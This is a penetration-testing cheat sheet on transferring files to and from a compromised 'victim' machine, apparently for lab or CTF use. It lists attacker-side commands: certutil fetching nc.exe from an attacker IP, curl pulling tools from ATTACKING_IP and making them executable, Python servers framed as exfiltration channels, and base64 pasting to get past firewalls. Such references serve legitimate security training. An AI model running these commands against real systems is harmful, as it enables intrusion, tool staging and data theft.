File Transfer - Quick Commands

Certutil (Windows)

---

Certutil.exe -urlcache -f http://10.10.10.10/file.txt file.txt

certutil.exe -verifyctl -split -f http://10.10.10.32:8000/nc.exe

Python

---

HTTP

# Python3 Opens port 80 as an http server to exfil data
$ python3 -m http.server 80

# Python2 
$ python -m SimpleHTTPServer 80

You can navigate to the IP and port 80 (or whatever port you set) and browse the directory.

You can chain this with certutil and prop up the http server on the attacker machine and use certutil to transfer tools over to the victim machine (Windows).

FTP

# Attacker machine
# Python2
$ python -m pyftpdlib 21

# Python3
$ python3 -m pyftpdlib -p 21 --write

# Windows Machine (victim)
>ftp {Attacker IP}

PHP

---

$ sudo php -S 0.0.0.0:80
PHP 7.4.15 Development Server (http://0.0.0.0:80) started

Base64

---

In some cases, we may not be able to transfer the file. For example, the remote host may have firewall protections that prevent us from downloading a file from our machine. In this type of situation, we can use a simple trick to base64 encode the file into base64 format, and then we can paste the base64 string on the remote server and decode it. For example, if we wanted to transfer a binary file called shell, we can base64 encode it as follows:

# Get the Base64 of the file
$ base64 shell -w 0

Now copy the base64 string and go to the remote host and decode it and pipe it into a file:

$ echo {base64 string} | base64 -d > shell

SCP (Requires SSH Access)

---

To use Secure Copy (SCP)

$ scp linenum.sh user@remotehost:/tmp/linenum.sh

• linenume.sh: This is the file to transfer

• /tmp/linenum.sh: You must specify the destination directory and filename for the transferred file

To use scp with an ssh access key:

scp -i <ssh_key> <file to transfer> user@<remotehost>:/home/user/filename

To transfer a directory:

$ scp -i id_rsa -r <Directory> adminuser@10.10.155.5:/home/adminuser/<Directory>

Wget (Linux)

---

Downloading a file and saving it with a specific name:

$ wget -O myfile.zip https://example.com/file.zip

Resuming a download:

If a download is interrupted, you can resume it with the -c option:

$ wget -c https://example.com/largefile.zip

Downloading multiple files:

$ wget https://example.com/file1.zip https://example.com/file2.zip

Downloading in the Background:

To download a file in the background (i.e., without holding up your terminal), use the -b option:

$ wget -b <URL>

Adjusting Speed Limit:

If needed, you can limit the download speed with --limit-rate:

$ wget --limit-rate=<rate> <URL>

Additional Options

• Verbose Mode: Use -v to enable verbose output, showing detailed information about the download process.

• User Authentication: Use --user and --password options for sites requiring authentication.

• Using Proxy: Use --proxy-user and --proxy-password for proxy authentication.

cURL

---

If you are on a compromised machine you can use:

curl <ip of attacker>:<port python server is running>/<filename> -o /<dir on victim>/filename

Example transferring over nmap and changing permissions of the file:

curl ATTACKING_IP/nmap -o /tmp/nmap-USERNAME && chmod +x /tmp/nmap-USERNAME

Metasploit

---

Upload/Download feature, so if we have a meterpreter shell it is very easy to upload/download a file

SMBServer.py

---

Run smbserver.py, and set the shareName and sharePath:

$ smbserver.py p .

• smbserver.py: Refers to the smbserver.py script, which is part of the Impacket toolkit. This script allows you to create an SMB server.

• p: share name that will be created and can be accessed

• .: The dot represents the current directory. It specifies the path to the directory that you want to share as an SMB share. In this case, it means the current directory in which you are running the command.

Now from the Windows machine on the same network, you can copy from the share you setup on the Kali box:

copy \\<Kali IP>\p\<filename>"

Validating File Transfers

---

To validate the format of a file, we can run the file command on it: